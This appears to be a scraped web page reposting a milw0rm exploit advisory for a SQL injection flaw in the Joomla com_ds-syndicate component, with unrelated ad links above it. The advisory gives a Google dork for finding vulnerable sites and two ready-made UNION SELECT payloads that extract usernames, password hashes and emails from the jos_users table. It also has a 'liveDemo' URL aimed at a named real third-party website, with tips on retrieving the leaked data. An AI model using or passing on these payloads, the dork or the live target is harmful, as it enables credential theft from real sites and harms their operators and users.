Play online games at GameDuell.
New Training Titles for Audio Software, Hardware
& Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers
#############################################
#Joomla com_ds-syndicate Sql-injetion vulnerability #
#############################################
#[~] Author : boom3rang
#[~] HomePage: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
#[~] Kosova Hackers Group
#[!] Component_Name: ds-syndicate
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:”com_ds-syndicate”
#############################################
#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]
#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users–
#[~] Exploit [2]:
1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
#[!] Note:
If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).
#[~] liveDemo:
http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users–
ps. here in this liveDemo you need to download file =feed1= .
#############################################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#############################################
(Captured from milw0rm.com)
Related Articles
No user responded in this post